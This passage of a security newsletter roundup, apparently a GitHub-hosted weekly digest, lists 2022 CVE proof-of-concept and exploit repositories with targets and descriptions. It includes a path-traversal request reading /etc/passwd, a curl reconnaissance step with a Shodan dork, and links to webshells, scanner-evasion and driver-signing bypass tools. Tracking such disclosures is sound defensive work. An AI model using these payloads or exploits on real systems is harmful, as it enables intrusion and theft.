\n\n</details>\n\n<details>\n<summary>CVE PoC, shell & Exploit (9) :\n</summary>\n\n   - [CVE-2022-39197 PoC](https://github.com/Wh04m1001/ZoneAlarmEoP)\n        - Target/Product: **Cobalt Strike**\n        - Description/Issue/Flaw : CVE-2022-39197 Cobalt Strike XSS vulnerability patch. Disables HTML support for Swing by hooking the isHTMLString method of javax.swing.plaf.basic.\n\n   - [CVE-2022-36804-PoC](https://github.com/notxesh/CVE-2022-36804-PoC)\n        - Target/Product: **Atlassian Bitbucket**\n        - Affected Version: <8.3.1\n        - Description : The script will automatically detect public repositories located on Bitbucket instances, then select a random repository to check or perform the vulnerability on. If there are no public repositories, a valid 'BITBUCKETSESSIONID' cookie is required in order to exploit known vulnerable instances. The PoC was designed to take multiple input hosts and pipe vulnerable hosts to stdout, allowing the results to be processed by other tools.\n\n   - [CVE-2022-30206](https://github.com/Pwnrin/CVE-2022-30206)\n        - Target/Product: **Microsoft**\n        - Description : PoC for Microsoft CVE-2022-30206: Windows Print Spooler Elevation of Privilege Vulnerability.\n\n   - [CVE-2022-28282](https://github.com/Pwnrin/CVE-2022-28282)\n        - Target/Product: **Firefox**\n        - Description/Issue/Flaw : PoC for CVE-2022-28282 Firefox: heap-use-after-free in DocumentL10n::TranslateDocument.\n\n   - [CVE-2022-34729](https://github.com/Pwnrin/CVE-2022-34729)\n        - Target/Product: **NorthSea**\n        - Description/Issue/Flaw : NorthSea decided to delay the disclosure of this PoC for some reason.\n\n   - [Cronos PoC](https://github.com/Idov31/Cronos)\n        - Description : PoC for a new sleep obfuscation technique (based on [Ekko](https://github.com/Cracked5pider/Ekko)) leveraging waitable timers to RC4 encrypt the current process and change the 
permissions from RW to RX to evade memory scanners.\n\n   - [CVE-2022-23743 PoC](https://github.com/Wh04m1001/ZoneAlarmEoP)\n        - Target/Product: **Check Point's ZoneAlarm antivirus**\n        - Affected Version: < 15.8.211.19229\n        - Description/Issue/Flaw : Exploit for Arbitrary File Move vulnerability in ZoneAlarm AV.\n\n   - [Webshell - Open source project](https://github.com/tennc/webshell)\n      - Description : Scripts that enable threat actors to compromise web servers and launch additional attacks. This project covers a variety of commonly used scripts, such as: asp, aspx, php, jsp, pl, py. NOTE : This project is only for testing, and all the consequences have nothing to do with the authors.\n\n   - [Windows10 - Custom Kernel Signers](https://github.com/HyperSine/Windows10-CustomKernelSigners)\n     - Description : Load self-signed drivers without TestSigning or disabling DSE.\n\n</details>\n\n---\n\n## CVE's that matter [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 14th September - 20th September 2022\n\n        Security Patched :   Latest IT security vulnerabilities patched within this week on selected companies such as WhatsApp, Apple, Google,\n                             Microsoft, GitHub, Linux (Ubuntu, Kali, etc.), WordPress, etc.\n\n        CVE ANALYSIS & POC:  CVE-2022-32883 Analysis: Turning Your Computer Into a GPS Tracker With Apple Maps.\n\n        CVE POC :            CVE-2022-32548 RCE, CVE-2022-2588, CVE-2022-34721, CVE-2022-36804, CVE-2022-34709,\n                             CVE-2022-33980, CVE-2019-2215 & GwisinMsi PoC based on the Recreating an MSI Payload for Fun and no profit blog.
\n\n<details>\n\n#### Security patched within a week (Trial)\n\n   - Apple iOS, iPadOS, and macOS Remote Code Execution Vulnerability CVE-2022-32917\n   - Code Aurora ACDB Audio Driver Stack-based Buffer Overflow Vulnerability CVE-2013-2597\n   - Linux Kernel\n     - Improper Input Validation Vulnerability CVE-2013-6282\n     - Integer Overflow Vulnerability CVE-2013-2596\n     - Privilege Escalation Vulnerability CVE-2013-2094\n   - GitHub packages :\n     - Multiple *TensorFlow (< 2.10.0) packages* (tensorflow, tensorflow-cpu, tensorflow-gpu) are vulnerable to\n       CHECK failures & segfaults that can be used to trigger a denial of service attack.\n     - oauthlib/oauthlib package (>=3.1.1) vulnerable to DoS when an attacker provides a malicious IPv6 URI.\n     - In the reactphp/http package (>= 0.7.0, < 1.7.0), when ReactPHP is processing incoming HTTP cookie values, the cookie names are URL-decoded. This may lead to cookies with prefixes like `__Host-` and `__Secure-` being confused with cookies that decode to such a prefix, thus leading to an attacker being able to forge a cookie which is supposed to be secure. 
It has been fixed in reactphp/http v1.7.0.\n\n   - Microsoft Windows Common Log File System (CLFS) Driver Privilege Escalation Vulnerability CVE-2022-37969\n   - Microsoft Windows Remote Code Execution Vulnerability CVE-2010-2568\n   - Trend Micro Apex One and Apex One as a Service Improper Validation Vulnerability CVE-2022-40139\n\n#### CVE Analysis & PoC\n\n   - [CVE-2022-32883 Analysis: Turning Your Computer Into a GPS Tracker With Apple Maps](https://breakpoint.sh/posts/turning-your-computer-into-a-gps-tracker-with-apple-maps)\n   - [CVE-2022-32883 PoC](https://github.com/breakpointHQ/CVE-2022-32883)\n       - Target/Product: **Apple Maps**\n       - Patched : Update devices running iOS and iPadOS to iOS 15.7/16 and iPadOS 15.7, and macOS Monterey to 12.6.\n       - Description/Issue : Ron Masas found and disclosed 2 vulnerabilities in Apple Maps that allowed him to extract the accurate location of the user without authorization.\n\n   - [GwisinMsi PoC](https://github.com/ChoiSG/GwisinMsi)\n       - Title: PoC MSI payload based on ASEC/AhnLab's blog - [Recreating an MSI Payload for Fun and no profit](https://blog.sunggwanchoi.com/recreating-a-msi-payload-for-fun-and-no-profit/)\n       - Target/Product: **MSI**\n       - Description/Issue : The payload is based on the [Gwisin ransomware's MSI payload analysis in the AhnLab ASEC team's blog post](https://asec.ahnlab.com/en/37483/).\n\n   - [CVE-2022-2588 PoC](https://github.com/sang-chu/CVE-2022-2588)\n      - Target/Product: **Linux kernel**\n      - Description/Issue: Linux kernel cls_route UAF\n\n   - [CVE-2022-34721 PoC](https://github.com/78ResearchLab/PoC/tree/main/CVE-2022-34721)\n       - Title: Windows Internet Key Exchange (IKE) Protocol Extension Remote Code Execution.\n       - Target/Product: **Windows Internet Key Exchange 
(IKE)**\n       - Description/Issue: The 3 vulnerabilities related to the IKE Extension were patched on Patch Tuesday in September 2022. One of the vulnerabilities was found during IKE-related research, which was patched by Yuki Chen.\n\n   - [CVE-2022-36804 PoC](https://github.com/CEOrbey/CVE-2022-36804-MASS-RCE)\n       - Target/Product: **Atlassian Bitbucket Server and Data Center**\n       - Affected Version: All versions of Bitbucket Server and Data Center released before versions 7.6.17, 7.17.10, 7.21.4, 8.0.3, 8.1.2, 8.2.2, and 8.3.1 are vulnerable.\n       - Description/Issue : A critical vulnerability (CVE-2022-36804) in Atlassian Bitbucket Server and Data Center could be exploited by unauthorized attackers to execute malicious code on vulnerable instances.\n\n   - [CVE-2022-34709 PoC](https://bugs.chromium.org/p/project-zero/issues/detail?id=2301)\n       - Title: **Windows: Credential Guard ASN1 Decoder Type Confusion EoP**\n       - Description/Issue : A number of Kerberos CG APIs do not verify the ASN1 PDU type when decoding and encoding Kerberos ASN1 structures, leading to type confusion and elevation of privilege. 
Microsoft patched this as CVE-2022-34709 - [Windows Defender Credential Guard Security Feature Bypass Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34709) - in a new version.\n\n   - [CVE-2022-33980 PoC](https://github.com/HKirito/CVE-2022-33980)\n       - Target/Product: **Apache Commons**\n       - Affected Version: 2.4 through 2.7\n       - Description/Issue: Apache Commons RCE; the url, dns and script keywords can be used to connect to any server.\n\n   - [CVE-2019-2215 PoC](https://github.com/ameetsaahu/Kernel-exploitation/tree/main/CVE-2019-2215)\n       - Target/Product: **Linux kernel**\n       - Affected Version: >= 4.14\n       - Description/Issue: Exploit for Bad Binder CVE-2019-2215 on x86_64 Android.\n\n</details>\n\n---\n\n<details>\n<summary><b>\n\nCVE's that matter [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 07th Sept - 13th Sept 2022\n\n        CVE POC :      CVE-2022-22629 MacOS, CVE-2022-37706, CVE-2022-40297, CVE-2022-34169, CVE-2022-20128, CVE-2022-20360, CVE-2022-27925,\n                       CVE-2022-37299, CVE-2022-25260, Chaining CVE-2021-42278 and CVE-2021-42287.\n\n        CVE Analysis : Latest IT security vulnerabilities patched on selected companies such as Apple, Google, Microsoft, GitHub,\n                       Linux (Ubuntu, Kali, etc.) & D-Link & CVE-2022-34169, CVE-2022-31474 WordPress.\n\n        Exploit :      Mobile Mouse 3.6.0.4 Remote Code Execution.\n\n</b></summary>\n\n### CVE PoC :\n  - [CVE-2022-22629 MacOS PoC](https://github.com/parsdefense/CVE-2022-22629)\n      - Target & Affected Version: **MacOS - Safari <15.4**\n      - Description/Issue : This PoC is for the WebGL (a JavaScript API used in browsers to render 2D and 3D graphics) 
bug that was patched in the Safari 15.4 security updates.\n\n  - [CVE-2022-37706 PoC](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit)\n      - Target & Affected Version: **Ubuntu 22.04 & Distro**\n      - Description/Issue : A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04)\n\n  - [CVE-2022-40297 PoC](https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc)\n    - Target & Version : **Ubuntu Touch 16.04**\n    - Title : Privilege escalation in Ubuntu Touch 16.04 - by PIN brute force\n    - Description : Ubuntu Touch allows you to \"protect\" devices with a 4-digit passcode. Such a code was set on a demonstration device. The problem is that the same 4-digit passcode then becomes a password that can be used with the sudo command to gain root privileges. This means that a malicious application can do double harm:\n      1. Easily escalate privileges and take control of the device.\n      2. Pass the screen unlock passcode to a third party.\n\n  - [CVE-2022-20128 PoC](https://github.com/irsl/CVE-2022-20128)\n    - Target : **Android Debug Bridge (adb) - directory traversal**\n    - Description : Android Debug Bridge (adb) was vulnerable to directory traversal attacks that could have been mounted by rogue/compromised adb daemons during an adb pull operation.\n\n  - [CVE-2022-20360 PoC](https://github.com/nidhi7598/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360)\n    - Target : **Android setChecked LPE**\n\n  - [CVE-2022-27925 PoC](https://github.com/mohamedbenchikh/CVE-2022-27925)\n    - Target & Patched Version : **Zimbra released a patch in 8.8.15P31 and 9.0.0P24.**\n    - Title : Zimbra Unauthenticated Remote Code Execution Exploit.\n    - Description : CVE-2022-27925 was originally listed as an RCE exploit requiring authentication. 
When combined with a separate bug, however, it became an unauthenticated RCE exploit that made remote exploitation trivial.\n\n  - [CVE-2022-37299 PoC](https://vulners.com/cve/CVE-2022-37299)\n    - Target & Version: **Shirne CMS 1.2.0 - Path Traversal**\n    - PoC: `GET /static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test`\n\n  - [Chaining CVE-2021-42278 and CVE-2021-42287 PoC](https://github.com/Ridter/noPac)\n    - Description/Issue : Exploiting [CVE-2021-42278 and CVE-2021-42287](https://4sysops.com/archives/exploiting-the-cve-2021-42278-samaccountname-spoofing-and-cve-2021-42287-deceiving-the-kdc-active-directory-vulnerabilities/) to impersonate a DA from a standard domain user.\n\n  - [CVE-2022-25260](https://github.com/yuriisanin/CVE-2022-25260)\n    - Target & Patched Version : **JetBrains Hub <2021.1.14276**\n    - Title : JetBrains Hub pre-auth semi-blind server-side request forgery (SSRF).\n    - Description : JetBrains Hub before 2021.1.14276 was vulnerable to improper access control (CVE-2022-34894), which allows an attacker to create untrusted services without authentication even if the guest user is disabled. This makes it possible to exploit the vulnerability without any other requirements (normally an attacker should be at least authenticated). The vulnerability was possible due to the use of Apache Batik with default settings for user-supplied SVG icon rasterization.\n\n### CVE Analysis :\n- This is a trial segment where we're experimenting with the idea of tracking and filtering CVEs for software essential to IT professionals. We're planning to provide CVE updates for selected companies such as Apple, Google, Microsoft, GitHub, Android, Linux (Ubuntu, Kali, etc.), D-Link and CVEs listed on the National Cyber Awareness System. 
Let me know if you have a suggestion or want to add your favorite company to this list.\n\n     - Vulnerability in NVIDIA Data Plane Development Kit Affecting Cisco Products (Cisco Catalyst 8000V Edge Software, Adaptive Security Virtual Appliance (ASAv) & Secure Firewall Threat Defense Virtual (formerly FTDv))\n     - Apple iOS, iPadOS, and macOS Input Validation Vulnerability CVE-2020-9934\n     - Oracle WebLogic Server Unspecified Vulnerability CVE-2018-2628\n     - Cisco Webex Meetings App (affected version <=42.7) Character Interface Manipulation Vulnerability.\n     - Google Chromium Insufficient Data Validation Vulnerability CVE-2022-3075\n     - Android OS Privilege Escalation Vulnerability CVE-2011-1823\n     - [Ubuntu Security Patches.](https://ubuntu.com/security/notices)\n              - Ubuntu 20.04 LTS : Linux kernel (Azure CVM) vulnerabilities.\n              - Ubuntu 16.04 ESM & Ubuntu 14.04 ESM : Dnsmasq vulnerability, LibTIFF vulnerabilities, Linux kernel (HWE) vulnerabilities, linux-oracle - Linux kernel for Oracle Cloud systems.\n     - D-Link DIR-816L RCE Vulnerability CVE-2022-28958\n     - D-Link DIR-820L RCE Vulnerability CVE-2022-26258\n     - D-Link Multiple Routers OS Command Injection Vulnerability CVE-2018-6530\n     - D-Link DIR-300 Router Cleartext Storage of a Password Vulnerability CVE-2011-4723\n     - NETGEAR Multiple Devices Exposure of Sensitive Information Vulnerability CVE-2017-5521\n\n---\n\n  - [CVE-2022-34169 Analysis](https://noahblog-360-cn.translate.goog/xalan-j-integer-truncation-reproduce-cve-2022-34169/?_x_tr_sch=http&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp) & construction of a [full exploit](https://gist-github-com.translate.goog/thanatoskira/07dd6124f7d8197b48bc9e2ce900937f?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)\n     - Target: **Apache Xalan-J - a Java implementation of an XSLT processor.**\n     - Description/Issue : In short, a vulnerability in Xalan-J, an Apache 
project used by multiple SAML implementations, could allow arbitrary code execution. Felix Wilhelm (Security Researcher at Google Project Zero) said that Xalan-J is vulnerable to an integer truncation issue when processing malicious XSLT (a markup language that can transform XML documents into other formats, such as HTML) stylesheets.\n\n - [CVE-2022-31474 WordPress](https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/)\n      - Target: **WordPress plugin - BackupBuddy**\n      - Affected Version : 8.5.8.0 and 8.7.4.1.\n      - Fully Patched Version: 8.7.5\n      - Description/Issue : The BackupBuddy plugin, with 140,000 active installations, is meant to help WordPress site administrators easily manage their backup operations and lets users store backups to various online and local destinations. The vulnerability assigned CVE-2022-31474, with a CVSS score of 7.5, exists because of an insecure method of downloading backups stored locally, which enables unauthenticated attackers to download sensitive files from vulnerable sites.\n\n - [CVE-2022-31188](https://github.com/emirpolatt/CVE-2022-31188)\n\n---\n\n### EXPLOIT :\n - [Mobile Mouse 3.6.0.4 Remote Code Execution](https://github.com/blue0x1/mobilemouse/blob/main/mobilemouse.py)\n      - Exploit Author: Chokri Hammedi\n      - Vendor Homepage: https://mobilemouse.com/\n      - Software Link: https://www.mobilemouse.com/downloads/setup.exe\n      - Version: 3.6.0.4\n      - Tested on: Windows 10 Enterprise LTSC Build 17763\n      - Description: Mobile Mouse 3.6.0.4 could allow a remote attacker to execute arbitrary code on the system, caused by improper input validation. By sending a specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. 
\n\n</details>\n\n---\n\n<details>\n<summary><b>\n\nCVE's that matter [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 30th August - 07th September 2022\n\n        CVE POC exploit : CVE-2022-1388, CVE-2022-32250 and CVE-2022-2639.\n\n        CVE Analysis :    CVE-2022-30592, CVE-2021-38297, CVE-2022-31814, CVE-2022-21371, CVE-2022-24637, CVE-2022-33174, CVE-2022-1802,\n                          CVE-2022-23779, CVE-2022-35406 and Week #35 of the Advisory Week Newsletter.\n\n</b></summary>\n\n - [CVE-2022-30592](https://github.com/efchatz/HTTP3-attacks)\n      - Target: **QUIC-enabled servers (IIS, NGINX, LiteSpeed, Cloudflare, H2O, and Caddy)**\n      - Description/Issue : HTTP3-attacks : The current repository serves the purpose of sharing the scripts we used for educational usage. These attacks were a part of our study, and were tested against 6 different QUIC-enabled servers that were configured to communicate with HTTP/3. The http-stream script is the exploit of the CVE-2022-30592 issue that affected the lsquic library. 
This script can also be used against the LiteSpeed server.\n\n - [CVE-2021-38297 Analysis](https://jfrog.com/blog/cve-2021-38297-analysis-of-a-go-web-assembly-vulnerability/)\n      - Target: **Golang (“Go”) programming language**\n      - Patched : fixed versions (1.16.9, 1.17.2 or later).\n      - Description/Issue : @jfrog has elaborated the prerequisites for exploiting the Go vulnerability, which allows an attacker to override an entire Wasm (WebAssembly) module with its own malicious code and achieve WebAssembly code execution, and explored mitigation strategies for developers.\n\n- [CVE-2022-23779](https://github.com/Vulnmachines/Zoho_CVE-2022-23779)\n     - Product: **ZOHO**\n     - Description/Issue : Zoho Internal Hostname Disclosure Vulnerability\n\n                            Step 1: curl -ILk https://IP:port/themes\n                            Step 2: Read the HTTP redirect response and analyze the Location HTTP response header.\n                            BONUS #Shodan : title:\"ManageEngine Desktop Central 10\"\n\n- [CVE-2022-2639 PoC](https://drive.google.com/drive/folders/1f5YzKy_NChwlbYqHp-7Ih3RTSTBq9Ns6?usp=sharing)\n     - Target: **Linux kernel openvswitch local privilege escalation.**\n     - Tested on : 5.13, 5.4, 4.18.\n     - Description/Issue : Uses the pipe primitive to exploit CVE-2022-2639, so no KASLR leak nor SMAP/SMEP/KPTI bypass is needed.\n\n- [CVE-2022-31814 Analysis](https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/)\n     - Target/Product: **pfBlockerNG plugin**\n     - Affected Version : <= 2.1.4_26\n     - Description/Issue : IHTeam undertook an independent security assessment of pfSense’s pfBlockerNG plugin version 2.1.4_26 and identified Unauthenticated Remote Command Execution as root (CVE-2022-31814).\n\n - [CVE-2022-21371](https://github.com/Vulnmachines/Oracle-WebLogic-CVE-2022-21371)\n      - 
Target/Product: **Oracle Fusion Middleware's Oracle WebLogic Server product**\n      - Affected Version : 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0\n      - Description/Issue : The Oracle Fusion Middleware's Oracle WebLogic Server product (Web Container component) is vulnerable to local file inclusion. This easily exploited vulnerability could allow an unauthenticated attacker with HTTP network access to compromise Oracle WebLogic Server. A successful attack gives the attacker complete access to Oracle WebLogic Server's whole data store or unrestricted access to sensitive data.\n\n - [CVE-2022-1388_PoC](https://github.com/alt3kx/CVE-2022-1388_PoC)\n      - Target: **F5 BIG-IP RCE exploitation**\n      - Affected Version : On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication.\n      - Description/Issue : F5 BIG-IP RCE exploitation (CVE-2022-1388)\n\n - [CVE-2022-33174](https://github.com/Henry4E36/CVE-2022-33174)\n      - Target/Product: **[Powertek PDUs](https://www.powertekpdus.com/)**\n      - Affected Version : Powertek PDU 3.30.30\n      - Description/Issue : Powertek PDUs are high quality custom rack power distribution units from Powertek Corporation. There is a security vulnerability in Powertek PDU versions prior to 3.30.30. The vulnerability stems from the fact that the power distribution unit allows remote authorization to be bypassed in the web interface. 
The vulnerability can be exploited by an attacker to obtain the username and password in clear text.\n\n - [CVE-2022-24637](https://github.com/JacobEbben/CVE-2022-24637)\n      - Target/Product : **Open Web Analytics (OWA)**\n      - Affected Version : <1.7.4.\n      - Description/Issue : Exploit for the Unauthenticated RCE in Open Web Analytics (OWA) <1.7.4. This work is based on https://devel0pment.de/?p=2494.\n\n - [CVE-2022-1802 + CVE-2022-1529 + CVE-2022-2200](https://github.com/mistymntncop/CVE-2022-1802)\n      - Tested: **Firefox 100.0.1**\n      - Description/Issue : Firefox 100.0.1 RCE via the Object prototype: an attacker could set undesired attributes on a JavaScript object, leading to privileged code execution.\n\n - [CVE-2022-35406 Writeup](https://medium.com/@mr.vrushabh/discovery-of-cve-2022-35406-303f4bca2742)\n      - Description/Issue : @mr.vrushabh found CVE-2022-35406 at PortSwigger Web Security. This was a bug in Repeater/Intruder whereby a meta redirect would be followed when a user clicked the follow redirection button regardless of the content type or content disposition headers used on the target web site. This could disclose the Referer header. It was considered a low severity issue because the attack scenario involved multiple unlikely steps that required user interaction.\n\n - Week 35 of the Advisory Week Newsletter. 
You'll see updates on [security fixes for Apple, Microsoft, GitHub, Red Hat, Ubuntu, Mozilla and the National Cyber Awareness System](https://advisoryweek.com/)\n\n</details>\n\n---\n\n<details>\n<summary><b>\n\nCVE's that matter [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 23rd - 30th August 2022\n\n      CVE POC exploit : CVE-2022-32250, CVE-2022-37042, CVE-2022-38766, CVE-2022-23779, CVE-2022-32250-Linux-Kernel-LPE,\n                        CVE-2022-22715, CVE-2022-37153, CVE-2022-2884, CVE-2022-2586 and CVE-2022-LPE-UAF.\n\n      CVE Analysis :    CVE-2022-20233, Multiple CVE in TENDA, CVE-2022-24787, CVE-2022-33318, CVE-2022-2884, CVE-2022-26377,\n                        CVE-2020-2733 and CVE-2022-30129.\n\n</b></summary>\n\n - [CVE-2022-32250 Exploit](https://github.com/theori-io/CVE-2022-32250-exploit)\n    - Target: **Linux Kernel**\n    - Affected Version: Linux before commit 520778042ccca019f3ffa136dd0ca565c486cedd (26 May 2022) & Ubuntu <= 22.04 before the security patch.\n    - Description : CVE-2022-32250 allows a local user to escalate privileges to root because an incorrect NFT_STATEFUL_EXPR check leads to a use-after-free (UAF).\n\n- [N-day exploit for CVE-2022-2586 - Analysis](https://www.openwall.com/lists/oss-security/2022/08/29/5)\n   - Target/Product: **Linux Kernel nft_object UAF**\n   - Affected Version : 3.16-rc1 and later\n   - Description : The vulnerability is a Use-After-Free (UAF) in nf_tables that makes it possible to escalate privileges from any user to root, and it has been present since kernel version v3.16-rc1. 
To exploit this bug we need to enter a new network namespace to obtain `CAP_NET_ADMIN` (i.e. unprivileged user namespaces must be enabled, which is the case on most Linux distributions nowadays).\n\n - [CVE-2022-22715 PoC](https://github.com/k0keoyo/my_vulnerabilities/tree/master/CVE-2022-22715)\n    - Target: **Windows OS**\n    - Description : In February 2022, Microsoft patched the vulnerability k0keoyo used in TianfuCup 2021 for escaping the Adobe Reader sandbox, assigned CVE-2022-22715. The vulnerability existed in the Named Pipe File System for nearly 10 years, since the AppContainer was born. We called it \"Windows Dirty Pipe\".\n    - Root Cause : The vulnerability existed in the Named Pipe File System driver, npfs.sys, and the affected function is npfs!NpTranslateContainerLocalAlias. When we invoke NtCreateFile with a named pipe path, it hits the IRP_MJ_CREATE major function of npfs, which calls NpFsdCreate.\n\n - [CVE-2022-20233 Analysis](https://blog.quarkslab.com/attacking-titan-m-with-only-one-byte.html)\n    - Product: **Titan M - A security chip introduced by Google in their Pixel smartphones, starting from the Pixel 3.**\n    - Patched : Pixel security update of June 2022.\n    - Description/Issue : On 2022-08-11, Google awarded Quarkslab's engineers Damiano Melotti and Maxime Rossi Bellom $75,000, and Damiano Melotti and Maxime Rossi Bellom presented their Titan M vulnerability research project at the Black Hat USA 2022 Briefings in Las Vegas. You can also check out this week's Tools section for tooling to find vulnerabilities on Titan M.\n\n - [Multiple CVE in TENDA](https://github.com/Darry-lang1/vuln/tree/main/Tenda/AC1206/4)\n    - Product: **Tenda AC1206 Router**\n    - Affected Version : V15.03.06.23\n    - Description/Issue : Recently, multiple CVEs have been assigned to the Tenda AC1206. 
CVEs to check out: CVE-2022-37798, CVE-2022-37799, CVE-2022-37800, CVE-2022-37801, CVE-2022-37802, CVE-2022-37803, CVE-2022-37804, CVE-2022-37805, CVE-2022-37806 & CVE-2022-37807.\n\n - [CVE-2022-24787 Report analysis](https://securitylab.github.com/advisories/GHSL-2022-001_Orckestra_C1_CMS/)\n    - Target/Product: **Orckestra C1 CMS - Content Management System that scales out in the cloud.**\n    - Version: v6.11\n    - Description : @JarLob (Jaroslav Lobacevski) reported an issue highlighting \"Deserialization of untrusted data (GHSL-2022-001) allows for Server Side Request Forgery (SSRF) or arbitrary file truncation.\"\n\n  - [CVE-2022-38766 PoC]\n    - Target/Product: **Renault 2021 ZOE electric car**\n    - Description/Issue : This vulnerability raised the question of whether ZOE electric vehicles are safe from RF hacking. For this reason, the actual ZOE vehicle released this year was targeted and attacked. A study was also conducted on how this attack bypasses rolling codes, a defense technique against RF hacking, and a lot of thought was needed about the handling method in case the car breaks down.\n\n - [CVE-2022-37042 PoC Exploit](https://github.com/aels/CVE-2022-37042)\n    -  Target: **Zimbra**\n    - Description : Zimbra CVE-2022-37042 Nuclei weaponized template; shell path: /public/formatter.jsp\n\n  - [CVE-2022-23779 Proof-of-Concept Exploit](https://github.com/Vulnmachines/Zoho_CVE-2022-23779)\n    - Target: **ZOHO**\n    - Description : Internal Hostname Disclosure Vulnerability\n\n - [CVE-2022-33318 - Remote Code Execution in ICONICS Genesis64](https://github.com/0vercl0k/paracosme)\n    - Target: **Genesis64 suite**\n    - Version: 10.97.1\n    - Description : Paracosme (Remote Code Execution in ICONICS Genesis64 exploit) was demonstrated during the Pwn2Own 2022 Miami contest that took place at the S4x22 Conference. 
Paracosme exploits a use-after-free issue found in the GenBroker64 process to achieve remote code execution on a Windows 21H2 x64 system. At a high level, the GenBroker64 process listens on TCP port 38080 and is able to deserialize various packets after a handshake has been done with a client. The issue I found is in the code that handles reading a VARIANT from the network socket. Basically a variant is a type and a value. The function seems well-written at first sight, and takes effort to only unpack certain types.\n\n - [CVE-2022-2884](https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/)\n    - Target: **GitLab**\n    - Patched Version: 15.3.1, 15.2.3, 15.1.5\n    - Description : There is a critical vulnerability with the identifier CVE-2022-2884 and a score of 9.9 in versions 11.3.4 to 15.1.4 and between 15.2 and 15.2.3, as well as 15.3 community and enterprise versions, which allows an attacker to execute code remotely. This vulnerability occurs in GitHub import.\n\n - [CVE - 2022-LPE-UAF](https://github.com/greek0x0/2022-LPE-UAF)\n    - Target: **Linux kernel**\n    - Description : Security researchers discovered 3 vulnerabilities in the Linux kernel that could allow a local attacker to elevate privileges and potentially execute malicious code. 
[Paper on DirtyCred by Zhenpeng Lin](https://zplin.me/papers/DirtyCred-Zhenpeng.pdf)\n\n\n - [CVE-2022-26377 Analysis](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/)\n    - Target: **Apache HTTPd**\n    - Title : apache-httpd-ajp-request-smuggling\n    \n    - Description : This article introduces a new attack method and idea for AJP, which can be used against the Apache HTTPd proxy_ajp reverse proxy for Tomcat AJP and against self-developed AJP reverse proxies; the same idea can also be tried horizontally against FastCGI and other protocols (though no other protocols have actually been dug into yet). \n\n - [CVE-2020-2733 Analysis](https://redrays.io/cve-2020-2733-jd-edwards/)\n    - Product: **Oracle JD Edwards EnterpriseOne Tools**\n    - Affected Version : < 9.2\n    \n    - Description/Issue : The vulnerability was discovered in the Oracle JD Edwards Management portal. To reproduce the vulnerability, you need to open (without authentication) the following [URL](http://JDEdwards:8999/manage/fileDownloader?sec=1). When you open the URL, you can see pseudo-random text in the page: ACHCJKGJHCJKBLLALOLOJFCABEFHOALDDAOFNGGANPDB. After analyzing the JD Edwards jar files, the researcher discovered that this pseudo-random data is THE ENCRYPTED ADMIN PASSWORD!\n\n - [CVE-2022-30129 - Analysis](https://blog.sonarsource.com/securing-developer-tools-argument-injection-in-vscode/)\n    - Target/Product: **Microsoft - Visual Studio Code**\n    - Affected Version : 1.67.1\n    \n    - Description/Issue : Argument Injection in Visual Studio Code : The vulnerability can be used to target developers that have the Visual Studio Code IDE installed. Upon clicking on a malicious link crafted by an attacker, victims are prompted to clone a Git repository in Visual Studio Code. 
\n\n</details>\n--- \n<details>\n<summary><b> \nCVE's that matter Week 03 -> 16th - 22nd Aug 2022 \n</b></summary>\n\n- [CVE-2022-1802 POC Exploit](https://github.com/mistymntncop/CVE-2022-1802)\n    - Target: **Amazon Linux 2 : thunderbird Package**\n    - Version Affected: <0:91.9.1-1.amzn2.0.1 \n    - Description : The Mozilla Foundation Security Advisory describes this flaw as:\n     An attacker could have sent a message to the parent process where the contents were used to double-index into a JavaScript object, leading to prototype pollution and ultimately attacker-controlled JavaScript executing in the privileged parent process. (CVE-2022-1529).\n\n- [CVE-2022-35742](https://blog.78researchlab.com/b9c80d00-d935-43b1-8805-969000df301d)\n    - Target: **Windows Outlook**\n    - Patched in August 2022\n    - Description : Denial of service in Outlook where an attacker can trigger the vulnerability by sending a crafted email; the vulnerability occurs during MIME property parsing.\n\n - [CVE-2021-43811 POC](https://github.com/s-index/CVE-2021-43811)\n    - Target: **awslabs/sockeye**\n    - Version: < 2.3.24 \n    - Description : Sockeye is an open-source sequence-to-sequence framework for Neural Machine Translation built on PyTorch. Sockeye uses YAML to store model and data configurations on disk. Versions below 2.3.24 use unsafe YAML loading, which can be made to execute arbitrary code embedded in config files. An attacker can add malicious code to the config file of a trained model and attempt to convince users to download and run it. If users run the model, the embedded code will run locally. 
